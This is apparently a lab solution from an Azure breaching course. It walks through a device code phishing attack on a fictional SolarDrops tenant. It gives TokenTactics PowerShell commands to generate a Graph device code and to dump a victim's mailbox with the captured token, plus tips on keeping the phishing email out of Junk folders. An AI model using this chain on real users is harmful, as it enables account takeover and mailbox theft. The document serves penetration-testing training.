Breaching Azure Intro
Introduction to Azure
Breaching SolarDrops
Breaching Bogus Bank

BA Lab 02 – Solution

Based on the content of the “SolarDropsservices.azurewebsites.net” it’s obvious that we need to perform a Device Code phishing attack.

There are several ways to perform a Device Code Phishing attack but, for the purpose of this lab, we will use https://github.com/rvrsh3ll/TokenTactics tool. Open a PowerShell terminal, navigate to your Tools folder and then import TokenTactics.psd1 file.

Import-Module .\BreachingAzureTools\TokenTactics-main\TokenTactics.psd1

Output:

WARNING: The names of some imported commands from the module 'TokenTactics' include unapproved verbs that might make them less discoverable. To find
the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.

Then you can generate a device code using the following:

Get-AzureToken -Client MSGraph

Output:

user_code        : C4UJUN7B3
device_code      : CAQABAAEAAAD--DLA3VO7Qr…
                  
verification_url : https://microsoft.com/devicelogin
expires_in       : 900
interval         : 5
message          : To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to authenticate.
authorization_pending
authorization_pending
authorization_pending

Next, we need to send an email to: paul@solardrops.onmicrosoft.com 

Note: Even though we are deleting the emails regularly, it is preferable to use a test email instead of your personal email address. Also, the device code is valid only for 15 minutes.

To avoid your phishing email being sent to the Junk folder, the sender email address should be from one of the following email service providers: gmail.com, hotmail.com, hotmail.co.uk, aol.com, protonmail.com, icloud.com, yahoo.com, outlook.com or ymail.com .

When Paul (paul@SolarDrops.onmicrosoft.com) clicks on the link, his access token will be captured using the TokenTactics Tool.

Using the TokenTactics tool we are able to dump the mailbox of Paul by executing the following command:

Dump-OWAMailboxViaMSGraphApi -AccessToken $response.access_token -mailFolder AllItems

Reviewing Paul’s mailbox we end-up into the below email:

Hi Paul,\r\n\r\nPlease find below your username and the part 1/3 of your password for your local machine:\r\n\r\nUsername: localpaul, Password Part 1/3: dtOpd IP: 10.0.2.4\r\n\r\nHave in mind that is only accessible through PS Remoting